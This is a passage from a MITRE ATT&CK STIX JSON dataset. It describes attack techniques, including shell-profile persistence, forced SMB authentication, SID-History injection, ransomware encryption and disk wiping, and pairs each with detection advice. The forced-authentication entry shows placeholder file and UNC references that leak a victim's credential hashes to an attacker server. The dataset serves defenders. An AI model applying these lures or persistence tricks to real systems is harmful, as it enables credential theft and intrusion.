"x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Unix Shell Configuration Modification", "description": "Adversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Robert Wilson", "Tony Lambert, Red Canary"], "x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", "created": "2020-01-24T14:13:45.936Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/004", "external_id": "T1546.004"}, {"source_name": "intezer-kaiji-malware", "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.", "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"}, {"source_name": "bencane blog bashrc", "description": "Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.", "url": "https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/"}, {"source_name": "anomali-rocke-tactics", "description": "Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.", "url": "https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect"}, {"source_name": "Linux manual bash invocation", "description": "ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.", "url": "https://wiki.archlinux.org/index.php/Bash#Invocation"}, {"source_name": "Tsunami", "description": "Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.", "url": "https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"}, {"source_name": "anomali-linux-rabbit", "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.", "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat"}, {"source_name": "Magento", "description": "Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.", "url": "https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html"}, {"source_name": "ScriptingOSX zsh", "description": "Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.", "url": "https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/"}, {"source_name": "PersistentJXA_leopitt", "description": "Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.", "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"}, {"source_name": "code_persistence_zsh", "description": "Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.", "url": "https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js"}, {"source_name": "macOS MS office sandbox escape", "description": "Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.", "url": "https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a"}, {"source_name": "ESF_filemonitor", "description": "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.", "url": "https://objective-see.com/blog/blog_0x48.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-08-14T19:30:45.123Z", "name": "Forced Authentication", "description": "Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.\n\nThe Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.\n\nWeb Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)\n\nAdversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)\n\nThere are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:\n\n* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)\n* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\\\[remote address]\\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Teodor Cimpoesu", "Sudhanshu Chauhan, @Sudhanshu_C"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.\n\nMonitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "created": "2018-01-16T16:13:52.465Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1187", "external_id": "T1187"}, {"source_name": "Cylance Redirect to SMB", "description": "Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.", "url": "https://www.cylance.com/content/dam/cylance/pdfs/white_papers/RedirectToSMB.pdf"}, {"source_name": "GitHub Hashjacking", "description": "Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.", "url": "https://github.com/hob0/hashjacking"}, {"source_name": "Microsoft Managing WebDAV Security", "description": "Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.", "url": "https://www.microsoft.com/technet/prodtechnol/WindowsServer2003/Library/IIS/4beddb35-0cba-424c-8b9b-a5832ad8e208.mspx"}, {"source_name": "Osanda Stealing NetNTLM Hashes", "description": "Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.", "url": "https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/"}, {"source_name": "Didier Stevens WebDAV Traffic", "description": "Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.", "url": "https://blog.didierstevens.com/2017/11/13/webdav-traffic-to-malicious-sites/"}, {"source_name": "US-CERT APT Energy Oct 2017", "description": "US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved November 2, 2017.", "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A"}, {"source_name": "Wikipedia Server Message Block", "description": "Wikipedia. (2017, December 16). Server Message Block. Retrieved December 21, 2017.", "url": "https://en.wikipedia.org/wiki/Server_Message_Block"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "SID-History Injection", "description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Alain Homewood, Insomnia Security", "Vincent Le Toux"], "x_mitre_detection": "Examine data in user\u2019s SID-History attributes using the PowerShell Get-ADUser cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015) Also monitor account management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015) (Citation: Microsoft DsAddSidHistory)\n\nMonitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "created": "2020-02-18T18:34:49.414Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134/005", "external_id": "T1134.005"}, {"source_name": "Microsoft SID", "description": "Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx"}, {"source_name": "Microsoft SID-History Attribute", "description": "Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/ms679833.aspx"}, {"source_name": "Microsoft Well Known SIDs Jun 2017", "description": "Microsoft. (2017, June 23). Well-known security identifiers in Windows operating systems. Retrieved November 30, 2017.", "url": "https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems"}, {"source_name": "Microsoft Get-ADUser", "description": "Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.", "url": "https://technet.microsoft.com/library/ee617241.aspx"}, {"source_name": "AdSecurity SID History Sept 2015", "description": "Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence #14: SID History. Retrieved November 30, 2017.", "url": "https://adsecurity.org/?p=1772"}, {"source_name": "Microsoft DsAddSidHistory", "description": "Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.", "url": "https://msdn.microsoft.com/library/ms677982.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:09.780Z", "name": "Theft of Operational Information", "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0882", "external_id": "T0882"}, {"source_name": "Mark Thompson March 2016", "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ", "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/"}, {"source_name": "Danny Yadron December 2015", "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ", "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Network Boundary Bridging", "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question. Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device\u2019s configuration to validate that the policy enforcement sections are what was intended. Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Firewall", "System Access Controls"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", "created": "2020-10-19T16:08:29.817Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1599", "external_id": "T1599"}, {"source_name": "Kaspersky ThreatNeedle Feb 2021", "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.", "url": "https://securelist.com/lazarus-threatneedle/100803/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Data Encrypted for Impact", "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)\n\nIn the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) \n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as \"print bombing\").(Citation: NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Oleg Kolesnikov, Securonix", "Mayuresh Dani, Qualys", "Harshal Tupsamudre, Qualys", "Travis Smith, Qualys", "ExtraHop"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\n\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "IaaS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "created": "2019-03-15T13:59:30.390Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1486", "external_id": "T1486"}, {"source_name": "CarbonBlack Conti July 2020", "description": "Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.", "url": "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"}, {"source_name": "FireEye WannaCry 2017", "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html"}, {"source_name": "Rhino S3 Ransomware Part 1", "description": "Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021.", "url": "https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/"}, {"source_name": "NHS Digital Egregor Nov 2020", "description": "NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.", "url": "https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary"}, {"source_name": "US-CERT Ransomware 2016", "description": "US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA16-091A"}, {"source_name": "US-CERT NotPetya 2017", "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A"}, {"source_name": "US-CERT SamSam 2018", "description": "US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.", "url": "https://www.us-cert.gov/ncas/alerts/AA18-337A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Disk Content Wipe", "description": "Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Novetta Blockbuster Destructive Malware)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for unusual kernel driver installation activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_impact_type": ["Availability"], "x_mitre_permissions_required": ["User", "Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", "created": "2019-03-29T14:59:50.763Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1488", "external_id": "T1488"}, {"source_name": "Novetta Blockbuster", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", "url": "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf"}, {"source_name": "Novetta Blockbuster Destructive Malware", "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.", "url": "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-03-01T17:17:37.292Z", "name": "Subvert Trust Controls", "description": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.\n\nAdversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)\n\nAnalyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure \"Hide Microsoft Entries\" and \"Hide Windows Entries\" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) \n\nMonitor and investigate attempts to modify extended file attributes with utilities such as xattr. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Autoruns Analysis", "Digital Certificate Validation", 